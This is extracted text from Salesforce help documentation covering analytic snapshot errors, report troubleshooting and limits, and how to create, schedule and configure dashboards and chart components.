The report in the Source Report field references a custom
object that is no longer available for reports or the relationships
between the objects in the report have changed.

Source report definition is obsolete.

The report in the Source Report field cannot run because
it contains invalid formulas or filter criteria. Update the report
so that it can run without errors.

Source report definition is invalid.

The user in the Running User field does not have permission
to access a report type associated with the report in the Source

Running user does not have permission to
access report type.

Report field. Choose a running user that has the correct
permissions or provide the existing running user with the
appropriate permissions.

The report in the Source Report field is no longer in tabular
format. Choose a new source report or update the existing
source report's format to tabular.

Source report must be tabular.

The report in the Source Report field was saved with its
details hidden. To display the details of the source report, view
the report, click the Show Details button, and save the report.

Source report last saved with details
hidden on report results.

The custom object in the Target Object field has been
deleted or the user in the Running User field does not have

Target object has been deleted or is
inaccessible to running user.

permission to access the target object. Restore the deleted
custom object, choose a new target object, or provide the
existing running user with “Create” permissions to the custom
object in the Target Object field. Note that if the custom
object's status is In Development, the running user must
have the “Customize Application” permission to access the
target object.

The user in the Running User field does not have “Create”
permissions on the custom object in the Target Object

Running user does not have permission to
edit target object.

field. Choose a running user that has such permissions or
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DescriptionError

provide the existing running user with “Create” permissions
to the custom object in the Target Object field.

The custom object in the Target Object field is a detail
object in a master-detail relationship, meaning that a master

Target object must not be a detail object
in a master-detail relationship.

object controls certain behaviors on the target object's records.
Choose a target object that is not included in a master-detail
relationship.

The custom object in the Target Object field is included
in a workflow. Choose a target object that is not included in
a workflow.

Target object must not be included in a
workflow.

An Apex trigger runs when new records are created for the
custom object in the Target Object field. Remove the Apex

Target object must not include an insert
trigger.

trigger or choose a target object for which an Apex trigger
does not run when new records are created.

The custom object in the Target Object field contains
validation rules. Choose a target object that does not contain

Target object must not include validation
rules.

validation rules or delete validation rules from the existing
target object.

The user in the Running User field is no longer active.
Choose an active user.

Running user is inactive.

One or more required fields on the target object are not
mapped. Map all required fields on the target object to fields
on the source report.

One or more required fields on the target
object are not mapped.

The report in the Source Report field contains too many
fields, criteria, or functions within a formula field. Remove

Source report contains too many fields,
has a formula field with too many
functions, or contains too many criteria. any unnecessary fields, criteria and functions within formula

fields from the source report.

The report in the Source Report field contains more than
100 fields. Remove any unnecessary fields from the source
report.

Source report cannot have more than 100
selected columns.

The custom object in the Target Object field contains
more than 100 custom fields. Remove any unnecessary fields
from the target object.

Target object cannot have more than 100
custom fields.

The report in the Source Report field may contain too
much data to process. Reduce the amount of data the report

Your report exceeded the time limit for
processing.

processes when running by limiting the report's date range
and remove any unnecessary fields from the source report.

The new snapshot you are trying to create has the same unique
name as that of a existing snapshot.

This Analytic Snapshot Unique Name already
exists. Please choose a unique name.

A summary field in the results has not returned a valid number.
For example, the field may have attempted to divide by 0.

A summary field did not return a valid
number.

2749

Gather Data with ReportsGather Data



DescriptionError

Check your formulas and test for 0 and “null” in calculations
if they appear in your data.

The source report format was changed from tabular to
summary, which made the field mappings in the analytic

There is a problem with this analytic
snapshot. The source report format was

snapshot incorrect. To fix this error, either change the reportchanged from tabular to summary. The field
format back to tabular or update the field mappings in themappings in the analytic snapshot are no
snapshot definition. This error only applies to analytic
snapshots with summary reports.

longer correct. You can change the report
format back to tabular or update the field
mappings in the snapshot definition.

The source report format must be either tabular or summary.
Matrix reports cannot be used with analytic snapshots.

There is a problem with this analytic
snapshot. Source report must be tabular
or summary.

This error may result when the running user no longer has
access to the field specified in the grouping level, or the

The grouping level you specified in the
analytic snapshot is no longer valid. The

grouping level was removed from the source report or wasrunning user may no longer have access to
never set. This error only applies to analytic snapshots withthat field, the grouping level may have
summary reports. Make sure the running user has access to
all necessary fields.

been removed from the source report, or
the grouping level was never set.

See Also:
Report on Historical Data with Analytic Snapshots
Manage Analytic Snapshots
Creating a Custom Report

Upgrade Report Builder

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To modify report and dashboard settings:

We've released an updated version of report builder, the powerful drag-and-drop editor for reports. With this upgrade:

• All profiles get access to the report builder by default. (You may continue to see the “Report Builder” permission in
permission sets and profiles and the PermissionSet and Profile objects in the API, though the upgrade overrides those
settings.)

• The old report wizard will be available only to users in Accessibility Mode.

• Group and Professional Edition organizations can use report builder.

• You get scatter charts, a new chart type for reports.
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Administrators for existing organizations must manually enable this upgrade. New organizations automatically get the latest
version of report builder. If you don't see the Report Builder Upgrade section on the User Interface Settings page, the upgrade
has already been enabled for your organization. It’s important to understand that assigning the “Report Builder” permission
to all users through profiles or permission sets isn’t the same thing as enabling report builder for your entire organization. To
do that, you need to follow the procedure in this topic.

Important:  Upgrading does not affect any of your existing reports. However, once you upgrade, you can't return to
the old report wizard.

To enable report builder for all users:

1. From Setup, click Customize > Reports & Dashboards > User Interface Settings.
2. Review the Report Builder Upgrade section of the page and click Enable. If you don’t see the button, report builder has

already been enabled for your entire organization.
3. Confirm your choice by clicking Yes, Enable Report Builder for All Users.

See Also:
Communicate Your Report Data Effectively

Troubleshoot Reports
Use these tips to help solve problems that arise when you’re working with reports.

• Why do my chart labels overlap? on page 2752

• Why doesn't my report return any data? on page 2752

• Why can't I see formula options in report builder? on page 2752

• Why doesn't my report return the data I expect? on page 2753

• What are some common report limits? on page 2753

• Why am I getting an “obsolete report” error message? on page 2754

• Improving Report Performance on page 2754

• Why is the old role name appearing in the "role hierarchy" trail of my report? on page 2755

• Why do I see a trail of roles on Activity or Opportunities reports? on page 2755

See Also:
Communicate Your Report Data Effectively
Why do my chart labels overlap?
Why doesn't my report return any data?
Why can't I see formula options in report builder?
Why doesn't my report return the data I expect?
What are some common report limits?
Why am I getting an “obsolete report” error message?
Improve Report Performance
Why is the old role name appearing in the "role hierarchy" trail of my report?
Why do I see a trail of roles on Activity or Opportunities reports?
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Why do my chart labels overlap?
Sometimes the labels for your charts can overlap and be difficult to read. There may be too much data in the same space, or
the segments or wedges of the chart may be too small.

To fix overlapping labels, try the following:

• Enlarge the chart. Change the chart size in the report to large or extra large or make the dashboard column wider.
• Remove extra grouping levels. Reduce the number of grouping levels by using a different chart type. For example, horizontal

bar charts have fewer values than grouped horizontal bar charts.
• Use horizontal charts. Horizontal charts use different spacing than vertical charts. The advantage of the horizontal bar

charts is that the chart can be extended vertically to show numerous groupings, though the width is fixed. Depending on
chart settings, you can also display Chatter photos.

• Change the scale. Set the chart to use larger units. For example, show values as multiples of 1000 or 1000000.
• Group small values. Select the Combine Small Groups into 'Others' option for pie, donut, and funnel charts.

See Also:
Troubleshoot Reports

Why doesn't my report return any data?

Check with your administrator to make sure you have access to the records you're trying to report on. If you're still not seeing
any results in your report, try casting a wider net:

• Show more than your own records. For example, select Show > All accounts.

• Expand your time frame filters. For example, select All Time for Range, or select a broader custom range.

• Choose field filter operators carefully. If you select Account Owner equals John James, you limit potential results
to exactly “John James.” If you don't see the results you expect, consider expanding the selection by using Account Owner
contains James instead.

• Check your filter logic. Make sure your combination of conditions isn't excluding all data.

Limiting your report can improve performance, but make sure you're not filtering out the data you want to see.

See Also:
Troubleshoot Reports

Why can't I see formula options in report builder?

If you can't see the Add Formula option in the Fields pane of report builder, change your report format to summary, matrix,
or joined. Formulas don't show up for tabular reports.

See Also:
Troubleshoot Reports
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Why doesn't my report return the data I expect?
If your data doesn't look as you expect, check the following:

Filters
Make sure to include all the data you want. To change a report filter, hover over it and click Edit or Remove. Your
filters display when you run your report; click Edit on that page to make additional changes.

Groupings
When you group by a field, you remove it from the details of the report. If you export the report, you see the field, though
it does not appear in the detail area.

Fields
After checking your groupings, check your fields. If your report contains multiple related records—for example, an
account, its opportunities, and their products—look at the detail pages for the account record, opportunity record, and
product line item to ensure that the fields contain data. If the data isn't available in the format you want, work with your
Salesforce administrator to add formula fields to get the data. When formula fields are added to an object, they appear
in record detail pages and in reports.

Report Type
The report type selected may not be appropriate or the records anticipated may not share the relationship between objects
required for the report type. When choosing a report, be sure you understand which fields are available in the report
type.

If your report type includes both parent and child objects, but no child fields are used in a report, the report shows parent
records whether they have a child record or not.

Hierarchy
Hierarchy options let you drill down to different data sets based on the role or user hierarchy. The selected hierarchy
level, or its default role, may affect the data shown.

Note:  Hierarchy applies to activity and opportunity reports.

See Also:
Troubleshoot Reports

What are some common report limits?

Here are common report limits. To see a full list of analytics limits, see Salesforce Limits.

Here are common report limits.

Editions InfoLimitFeature

Available in Enterprise, Unlimited, and Developer Editions.Up to 5 (each bucket field can
have 20 buckets)

Bucket fields per report

Available in all editions.Up to 400,000 summarized
values

Matrix reports1
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Editions InfoLimitFeature

Available in Professional, Enterprise, Unlimited, Developer
Editions.

One or two per hour, based
on edition

Scheduled reports per
organization 2

Available in all editions.Up to 20Field filters per report

Available in all editions.Up to 5Formulas per report

Available in all editions.Up to 2,000Rows displayed in a report
3

Available for all editions.Up to 20 rows for summary
and matrix reports, and up to
50 rows for tabular

Rows displayed in the
report builder preview

1 Data exceeding this limit is not displayed.2 Hourly limits vary by edition.3 To view all the rows, export the report to Excel
or use the printable view for tabular and summary reports. For joined reports, export is not available, and the printable view
displays a maximum of 20,000 rows.

See Also:
Troubleshoot Reports

Why am I getting an “obsolete report” error message?

You may see this error because:

• An object in the report isn’t enabled for reporting anymore.

• A lookup relationship used by objects in the report has been deleted or modified.

• An object in the report has been deleted.

• You don’t have “View” permissions for an object in the report.

See Also:
Troubleshoot Reports

Improve Report Performance

Many factors can cause a report to perform poorly or to time out. Most of them can be addressed by simple changes, such as
using the correct filter operators, increasing the number of filters, and reducing the amount of data.

Available in: All editions except Database.com

Watch this video for quick tips on Making Your Reports Run Faster (3:14 minutes).
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A report can take anywhere from a few seconds to several minutes to run. Occasionally, a report is so complex that it exceeds
the timeout limit and fails. If the report is slow to load, it’s because:

• It is querying too many objects
• It is dealing with intricate lookups
• It has too many fields

If you can’t view a report and want to edit it to avoid the time out, you can append ?edit=1 to the report URL to get to edit
mode, where you can adjust the criteria. Try these tips to get your reports to run more efficiently.

• When filtering, use the equals or not equal to operators instead of contains or does not contain. For example,
use Account Owner equals John James, not Account Owner contains John. Choose AND rather than
OR for filter logic

• Use time frame filters to narrow your report’s date range. For example, use Last 30 Days instead of Current FY.
• Set time frame filters by choosing a Date Field and Range to view. Only records for that time frame are shown.
• Reduce the number of fields in the report by removing unnecessary columns or fields.
• If you receive an error message that your activity report has too many results, customize the report to include a filter on a

picklist, text, or date field. Alternatively, rerun the report using a different activity data type such as “Activities with
Accounts” or “Activities with Opportunities”.

• Add time filters, scope filters, and filter criteria to the report to further narrow the results.

See Also:
Troubleshoot Reports
Filter Your Report Data
Enter Filter Criteria
Getting the Most Out of Filter Logic

Why is the old role name appearing in the "role hierarchy" trail of my report?

Changes to role name aren’t automatically updated in reports. To see the latest role name, change the Role name as
displayed on reports field for the role record.

See Also:
Troubleshoot Reports

Why do I see a trail of roles on Activity or Opportunities reports?

When you run Activity and Opportunity reports, your organization's hierarchy appears above the results. These filters allow
you to display and share data in reports based on different levels in the hierarchy.

For example, if you see CEO > VP of Global Sales > Sales Operations Director, you’re viewing data for the Sales Operations
Director role.

See Also:
Troubleshoot Reports
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SHARE INSIGHTS

Share Insights with Dashboards
Dashboards help you visually understand changing business conditions so you can make decisions based on the real-time data
you have gathered with reports. Use dashboards to help users identify trends, sort out quantities, and measure the impact of
their activities.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Watch a Demo: An Overview of Dashboards (3:20 minutes)

Note: Dashboards in Group Edition organizations are view-only.

See Also:
Create a Dashboard
Delete a Dashboard
Choose a Dashboard Running User
Schedule a Dashboard Refresh
Add a Dashboard Component
Modify a Dashboard Component
Provide Individualized Views of a Dashboard
Let Users View Dashboards on the iPad
Edit Dashboards in Accessibility Mode
Why doesn't my dashboard display the data I expect?
Filter Dashboard Data
Create a Dashboard
Get Started with Dashboards
Provide Individualized Views of a Dashboard
How Salesforce Analytics Works

Create a Dashboard
Create a dashboard to provide a graphical view of the data in your reports.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

Tip:  You can clone a dashboard to quickly create a new dashboard with the same properties and components as the
one you're viewing. Just click Clone, modify the dashboard settings, and save.

1. Create the custom reports containing the data you want to display.

Important: Be sure to store these reports in folders that your intended dashboard viewers can access.

2. Click the Dashboards tab.
3. Click Go To Dashboard List.
4. Click New Dashboard to create a new dashboard.

To modify an existing dashboard, click its name from the list.

5. Customize your dashboard and click Save.

See Also:
Share Insights with Dashboards
Delete a Dashboard
Install the CRM Sample Dashboards from AppExchange

Delete a Dashboard
It’s a good idea to delete dashboards that you no longer need.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To delete dashboards:

“Manage Dashboards” AND “Modify All Data”To delete dashboards created by another user:

Deleting a dashboard also deletes the components within it. It doesn't delete the custom reports used by the components.

Deleted dashboards are moved to the Recycle Bin.

1. Click the Dashboards tab.
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2. Click Go To Dashboards List.
3. Choose the folder where the dashboard is stored.
4. Click Del next to the name of the dashboard.

See Also:
Share Insights with Dashboards

Choose a Dashboard Running User
Select a running user to specify which data to display in a dashboard.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create, edit, and delete dashboards:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

“View My Team's Dashboards” OR “View All Data”To enable choosing a different running user for the dashboard:

Each dashboard has a running user, whose security settings determine which data to display in a dashboard.

If you have “View All Data,” you can choose any user in your organization to be a running user of the dashboard. If you have
“View My Team's Dashboards,” you can choose any user below you in the role hierarchy.

Note:  Dashboard components that use Visualforce ignore the running user; content displays only if the viewing user
has access to the Visualforce page. Other components in the dashboard are not affected.

Users with a Salesforce Platform or Salesforce Platform One user license can only view a dashboard if the dashboard running
user also has the same license type. Consider creating separate dashboards for users with different license types.

1. Edit a dashboard.

2. Click the  button next to the View dashboard as field.

Note:  If you don’t have “Manage Dynamic Dashboards” permission, just enter a running user and skip to the
final step. Enter “*” to see all available users.

3. Choose a running user setting.

• Run as specified user. The dashboard runs using the security settings of that single, specific user. All users with access
to the dashboard see the same data, regardless of their own personal security settings. This approach is perfect for
sharing the big picture across a hierarchy, or motivating team members by showing peer performance within a team.
If you don’t have “View All Data,” you can only choose yourself. If you have “View My Team's Dashboards,” you can
choose any user below you in the role hierarchy.
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• Run as logged-in user. A dynamic dashboard runs using the security settings of the user viewing the dashboard. Each
user sees the dashboard according to his or her own access level. This approach helps administrators share one common
set of dashboard components to users with different levels of access.

4. Optionally, select Let authorized users change running user to enable those with permission to change the
running user on the dashboard view page.

• Users with “View My Team's Dashboards” can view the dashboard as any user below them in the role hierarchy.
• Users with “View All Data” can view the dashboard as any user in their organization.

Note:  If you have“View All Data” or “View My Team's Dashboards,” you can preview the dashboard edit page
as a different user, but you must select Let authorized users change running user to change the
running user from the dashboard view page.

5. Click OK.
6. In the View dashboard as field, enter a running user.
7. Save your dashboard.

See Also:
Share Insights with Dashboards

Schedule a Dashboard Refresh
In Enterprise Edition and Unlimited Edition, you can schedule dashboards to refresh daily, weekly, or monthly.

Available in: Enterprise and Unlimited Editions

User Permissions Needed

“Schedule Dashboards”To schedule and email a dashboard refresh:

“Modify All Data”To delete the schedule to refresh a dashboard:

Note:  Users with the “View Setup and Configuration” permission can view all the dashboards scheduled to refresh
for your organization on the All Scheduled Jobs page. To view the All Scheduled Jobs page, from Setup, click
Monitoring > Scheduled Jobs or Jobs > Scheduled Jobs. Users with “Modify all Data” permission can click Del
next to a specific scheduled dashboard refresh to permanently delete all instances of the scheduled refresh.

You can also set up Salesforce to send an email with an HTML version of the dashboard when the refresh completes. For
email applications that don't support HTML, the email includes text and a link to the dashboard.

1. On the Dashboards tab, select a dashboard using the View Dashboard field.
2. Click Refresh  and choose Schedule Refresh

Scheduling or emailing a filtered dashboard returns unfiltered data.

Each dashboard has a running user, whose security settings determine which data to display in a dashboard.
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Note:  If the running user becomes inactive, the report is not run. The system administrator receives an email
notification to either activate the user, delete the report schedule, or change the running user to an active one in
the scheduled report.

3. Select notification settings.

• Click To me to send an email to your user's address.
• Click To others... to send an email to additional Salesforce users.

Note:  Portal users receive report and dashboard refresh email notifications when the Allow Reports and
Dashboards to Be Sent to Portal Users option is enabled.

• Dashboard refresh notifications may not display properly in Outlook 2007.
• In HTML-formatted dashboard refresh notifications, users can click the name of the dashboard to log in to Salesforce

and view the dashboard.
• To send a dashboard refresh notification to other users, store the dashboard in a public folder with access granted to

others. Other users can't access dashboards in your personal folders. To add a dashboard to a public folder, edit the
dashboard properties.

• Users can click components in a dashboard refresh notification to view the source report in Salesforce.
• Dashboard components that include Visualforce pages and s-controls may not display in dashboard refresh notifications.

Users must view them in Salesforce.
• Dashboard refresh notifications can be viewed offline in email clients.
• If a dashboard has filters, only the unfiltered version is emailed.
• By default, Salesforce sends images in dashboard emails as .png (Portable Network Graphic) files, which are not

supported in Lotus Notes. When you enable the Use Images Compatible with Lotus Notes in Dashboard
Emails > option, Salesforce uses .jpg images, which Lotus Notes supports, when sending dashboard emails. The
“Schedule Dashboard” permission is required to view this option.

Note:  Dashboard emails that contain images compatible with Lotus Notes are substantially larger and the
image quality may be lower.

4. Schedule the refresh.

a. Set the Frequency field.

Click the Daily, Weekly, or Monthly fields to show more options.

The total number and frequency of your scheduled dashboard refreshes depends on your Salesforce edition. Enterprise
and Unlimited editions can have up to 200 scheduled dashboard refreshes. Unlimited Edition users can schedule up
to two dashboard refreshes an hour per day. Enterprise Edition users can schedule up to one dashboard refresh an hour
per day. Additional scheduled dashboards may be available for purchase. Contact your salesforce.com representative
for information.

b. Specify dates in the Start and End fields.

Dashboards refresh in the time zone of the user who scheduled the refresh. For example, if the Time Zone field on
your user record is set to Pacific Standard Time (PST), and you schedule a dashboard to refresh every day at 2:00 PM,
then the dashboard will refresh every day between 2:00 PM and 2:29 PM PST.If you view and save a schedule in a
time zone different from the one in which it was previously scheduled, the time slot could potentially change.

c. Under Preferred Start Time, click Find available options... to choose a time.
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The dashboard refresh runs within 30 minutes of your preferred start time. For example, if you select 2:00 PM, the
refresh may happen any time between 2:00 PM and 2:29 PM, depending on availability.

Note:  Your preferred start time may not be available if other users have already selected it.

• If you schedule a dashboard to refresh on a specific day of every month, it only refreshes on months that have that
specific day. For example, if you schedule a refresh for the 31st of every month, the dashboard won't refresh on 30-day
months. To refresh on the last day of every month, choose “Last” from the On day of every month drop-down
list.

• Dashboards won't refresh as scheduled if the running user doesn't have access to the dashboard folder.
• If a dashboard has filters, only the unfiltered version is refreshed.
• You can't schedule refreshes for dynamic dashboards. They must be refreshed manually.

5. Click Save.

To delete a scheduled dashboard refresh, click Refresh > Schedule Refresh > Unschedule Dashboard.

The scheduled refresh is permanently deleted, and not sent to the Recycle Bin. Deleting the scheduled refresh does not affect
the dashboard itself.

See Also:
Share Insights with Dashboards
Apply a Dashboard Filter
Refresh Dashboard Data

Add a Dashboard Component
Add components by dragging a component type onto the dashboard, then dropping a data source (report, s-control, or
Visualforce page) onto it.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

1. On the dashboard where you want to add a component, click Edit.

You can continue to edit the dashboard while components and data sources are loading.

2. Drag the component type you want from the Components tab onto your dashboard.
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Tip:  You can also drop the data source first, then drop a component type onto it.

To select the kind of component you need, consider the type of data you’re showing and the uses it will serve.

Use a chart when you want to show data graphically. You can choose from a variety of chart types.

Use a gauge when you have a single value that you want to show within a range of custom values

Use a metric when you have one key value to display.
• Enter metric labels directly on components by clicking the empty text field next to the grand total.
• Metric components placed directly above and below each other in a dashboard column are displayed

together as a single component.

Use a table to show a set of report data in column form.

Use a Visualforce page when you want to create a custom component or show information not available
in another component type.

Visualforce Page

Custom s-controls can contain any type of content that you can display in a browser, for example a
Java applet, an Active-X control, an Excel file, or a custom HTML Web form.

Custom
S-Control

3. Drag a report from the Data Sources tab onto the component you just dropped on the dashboard.

• You can show a joined report that includes a chart on a dashboard. Edit the joined report dashboard component and
select Use chart as defined in the source report.

• If the dashboard has a filter, the data source must contain the filter field or an equivalent. If it doesn't, the filter may
not work.

• Some custom forecast and lead reports aren't available for dashboards.
• For Visualforce components, the data source must be a Visualforce page.

Tip:  Each folder can contain up to 200 data sources. To home in on the right data source quickly, try Quick Find
or the Recent, My, and All filters.

4. Click  on your dashboard component.
5. On the Component Data tab, choose which summary fields and groupings in the underlying report you want to display

in your component.

Tip:  Make more fields available for a dashboard component by adding them to the source report chart.For
example, create a combination chart on the report using vertical columns and lines. The additional groupings in
the report chart are available to use in dashboard components.

6. On the Formatting tab, specify how your component shows its data.

Your formatting choices depend on the component type you choose.

Note:  For Visualforce pages and s-controls, set the Height.
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7. Click OK.
8. Drag, drop and click to rearrange components on the dashboard.

• Grab components by the header bar and drag them to the right location on the dashboard.
• Click  for a data source to remove it from the component.
• Click  for a component to remove it from the dashboard.
• Click component header, title, and footer fields to edit them.
• Change colors for picklist values displayed in dashboard components. You need the “Customize Application” permission

to update picklists.
• Optionally, for filtered dashboards, choose a different field in the Filtered By drop-down.

See Also:
Share Insights with Dashboards

Modify a Dashboard Component
A dashboard component is a visual representation of the data in a report. You can change where the component’s data comes
from, what the data looks like in the component, and what kind of component it is.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

Dashboard builder is a drag-and-drop interface for creating and modifying dashboards. Drag, drop and click to rearrange
components on the dashboard. Hover details and drill-down are available when you view and not when you edit a dashboard.

See Also:
Share Insights with Dashboards
Make Fields Available in a Dashboard Component
Choose Where Users Go When Clicking a Dashboard Component
Create a Custom Four-Column Table
Dashboard Component Types
Chart Types
Data Settings for Dashboard Chart Components
Visual Settings for Dashboard Chart Components
Add a Dashboard Filter
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Make Fields Available in a Dashboard Component
Make more fields available for a dashboard component by adding them to the source report chart.

For example, create a combination chart on the report using vertical columns and lines. The additional groupings in the report
chart are available to use in dashboard components.

See Also:
Modify a Dashboard Component

Choose Where Users Go When Clicking a Dashboard Component
You can edit a dashboard component so that when users click the component, they can drill down to the source report, filtered
report, record detail page, or other URL.

Edit a component and set the Drill Down to option on the Component Data tab. Choose one of these options:

• Source Report—Takes the user to the full source report for the dashboard component.

• Filtered Source Report—When users click individual groups, X-axis values, or legend entries, they are taken to the source
report filtered by what they clicked.

For example, if you had a stacked vertical column chart of opportunities grouped by stage, with months as the X-axis, you
could click an individual stage in a bar, a month on the X-axis, or a legend entry for a stage to drill down to the filtered
source report. (Not available for gauges, metrics, or tables.)

• Record Detail Page—When users click chart or table elements, axis values, or legend entries, they are taken to the detail
page for that record. You can only choose this option for tables and charts that use a source report grouped by record name,
record owner, or feed post. (Not available for gauges or metrics.)

• Other URL—Takes the user to the URL that you specify. You can't add URLs that begin with “mailto:” or “javascript:”
to dashboard components.

See Also:
Modify a Dashboard Component

Create a Custom Four-Column Table
You can use the default two-column table or create a custom table with up to four columns and totals.

Customized tables allow null values in the results. Default two-column tables do not.

To customize a table, the source report must be summary or matrix format and contain a chart. To create a four-column table,
edit a table component on a dashboard and click the Customize Table link.

Specify up to four columns to display in the table. Available columns can be any grouping or summary field used in the chart.
Update the report's chart or groupings to make more columns available for the dashboard table. Make sure to select a numeric
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field for one of the columns. For example, create a combination chart on the report using vertical columns and lines. The
additional groupings in the report chart are available to use in dashboard components.

See Also:
Modify a Dashboard Component

Dashboard Component Types
Dashboard components can be charts, tables, gauges, metrics, or other components that you can create with VisualForce.

DescriptionImageComponent Type

Use a chart when you want to show data graphically. You can choose from a variety of
chart types.

Chart

Use a gauge when you have a single value that you want to show within a range of custom
values. For example, to create a dashboard that measures where your current closed

Gauge

opportunity amounts fall within a range of values, set the Minimum Value, Breakpoint
#1 Value, Breakpoint #2 Value, and Maximum Value for the gauge. The ranges
that you set can indicate poor, acceptable, and good performance. Set appropriate colors
for each of these ranges to visually indicate progress. To create a gauge with only two
ranges, leave Breakpoint #2 Value blank.

Select Show Percentage or Show Total to display those values on the gauge. Values
exceeding the maximum are shown as greater than 100%.

Use a metric when you have one key value to display. For example, if you have a report
showing the total amount for all opportunities in the Closed, Commit, and Base Case

Metric

stages in the current month, you can name that value and use it as a revenue target for the
month displayed on the dashboard.

Use a table to show a set of report data in column form. For example, to see the top 20
opportunities by amount, set Maximum Values Displayed to 20, click Customize

Table

Table and select opportunity name, amount, and other columns to display, choose the sort
order, and set conditional highlighting. Available columns include all chart groupings and
report summary fields, as well as the second-level grouping defined in the report.

Use a Visualforce page when you want to create a custom component or show information
not available in another component type. For example, a Visualforce page can display data

N/AVisualforce Page

from an external system or show Salesforce data in a custom way. Visualforce pages must
meet certain requirements to be displayed in dashboards; otherwise, they don't appear in
the Visualforce Page drop-down list. See Creating Visualforce Dashboard
Components.
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DescriptionImageComponent Type

Custom s-controls can contain any type of content that you can display in a browser, for
example a Java applet, an Active-X control, an Excel file, or a custom HTML Web form.

N/ACustom S-Control

Important: S-controls have been superseded by Visualforce pages. Organizations
that haven’t previously used s-controls can’t create them. Existing s-controls are
unaffected, and can still be edited.

See Also:
Modify a Dashboard Component
Modify a Dashboard Component

Chart Types
You can show data in reports and dashboards in the form of bars, columns, lines, shapes, or other elements. Which is right
depends on what the data is about and what you want to show with it.

See Also:
Modify a Dashboard Component
Bar Charts
Column Charts
Line Charts
Pie Charts
Donut Charts
Funnel Charts
Scatter Charts
Scatter Charts
Modify a Dashboard Component
Create a Custom Report in Accessibility Mode
Show Different Data Sets in One Chart
Data Settings for Dashboard Chart Components
Visual Settings for Dashboard Chart Components

Bar Charts

A bar chart shows values as horizontal lengths, so this format can be good for comparing distance or time. Use a bar chart
when you have a summary report with a single grouping, or you only want to display one grouping.

Available in: All editions except Database.com
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For example, to see the amount in each sales stage in a report, select Sum of Amount as the X-axis and Stage as the
Y-axis. The chart displays one bar for each stage, with the length proportional to the total opportunity amount.

The advantage of the horizontal bar charts is that the chart can be extended vertically to show numerous groupings, though
the width is fixed. Depending on chart settings, you can also display Chatter photos.

See Also:
Chart Types
Grouped Bar Charts
Stacked Bar Charts
Bar Charts Stacked to 100%
Data Settings for Dashboard Bar and Column Chart Components
Formatting Settings for Dashboard Bar Chart Components

Grouped Bar Charts

Use a grouped bar chart when you have multiple groupings, and you want to compare values within a secondary grouping, but
not the totals.

Available in: All editions except Database.com

For example, to compare the amount of deals closed each month by lead source in a report, set amount as the X-axis, source
as the Y-axis, and closing month as the Groupings value. The chart displays a set of bars for each source, one bar for each
month. The monthly differences within a particular source are easy to compare.

You can also compare a given month across sources, but comparing the total number of leads for each source may be difficult.

Tip: Use a stacked chart to compare totals.

See Also:
Bar Charts
Stacked Bar Charts
Bar Charts Stacked to 100%

2767

Share Insights with DashboardsShare Insights



Stacked Bar Charts

Use a stacked bar chart when you have multiple groupings and are interested in the proportions between values in each grouping,
as well as each grouping's total.

Available in: All editions except Database.com

For example, to compare the status of leads by campaign in a report, and also to compare the totals for each status, set record
count as the X-axis, status as the Y-axis, and campaign as the Groupings value. The chart displays a single bar for each
status, broken down by campaign, with each campaign shown in a different color.

The proportion of each campaign in each status is easy to compare, as are the totals for each status, but comparing a single
campaign’s contribution to different statuses, or to the total, may be difficult.

See Also:
Bar Charts
Grouped Bar Charts
Bar Charts Stacked to 100%
Column Charts
Grouped Column Charts
Stacked Column Charts
Column Chart Stacked to 100 Percent

Bar Charts Stacked to 100%

Use a bar chart stacked to 100 percent when you have multiple groupings and are interested in the proportions between values
in each grouping, as well as each grouping's total.

Available in: All editions except Database.com

For example, to compare the status of leads by campaign in a report, and also to compare the totals for each status, set record
count as the X-axis, status as the Y-axis, and campaign as the Groupings value. The chart displays a single bar for each
status, broken down by campaign, with each campaign shown in a different color.
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The proportion of each campaign in each status is easy to compare, as are the totals for each status, but comparing a single
campaign’s contribution to different statuses, or to the total, may be difficult.

See Also:
Bar Charts
Grouped Bar Charts
Stacked Bar Charts

Column Charts

A column chart is very much like a bar chart, but it can be a better format for showing relative counts of things, such as leads
or dollars. Use a column chart when you have a summary report with a single grouping, or you only want to display one
grouping.

Available in: All editions except Database.com

For example, to see the number of leads by lead source in a report, set record count as the Y-axis and source as the X-axis.
The chart displays one column for each source, with the height proportional to the total number of leads. The width of column
charts is constrained by dashboard column size and report chart size. Horizontal bar charts may be better for large numbers
of groupings. Column charts are good when showing values by date, since dates traditionally run along the X-axis.

See Also:
Chart Types
Grouped Column Charts
Stacked Column Charts
Stacked Bar Charts
Column Chart Stacked to 100 Percent

Grouped Column Charts

Use a grouped column chart when you have multiple groupings, and you want to compare values within a secondary grouping,
but not the totals.

Available in: All editions except Database.com
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For example, to compare the number of opportunities created each month by campaign source in a report, set record count as
the Y-axis, created month as the X-axis, and source as the Groupings value. The chart displays a set of bars for each
month, one bar for each campaign source. The differences between sources within a particular month are easy to compare.

You can also compare a particular source across months, but comparing the total number of opportunities for each month may
be difficult.

Tip: Use a stacked chart to compare totals.

See Also:
Column Charts
Stacked Column Charts
Stacked Bar Charts
Column Chart Stacked to 100 Percent

Stacked Column Charts

Use a stacked column chart when you have multiple groupings and you’re interested in the proportions between values in each
grouping, as well as each grouping's total.

Available in: All editions except Database.com

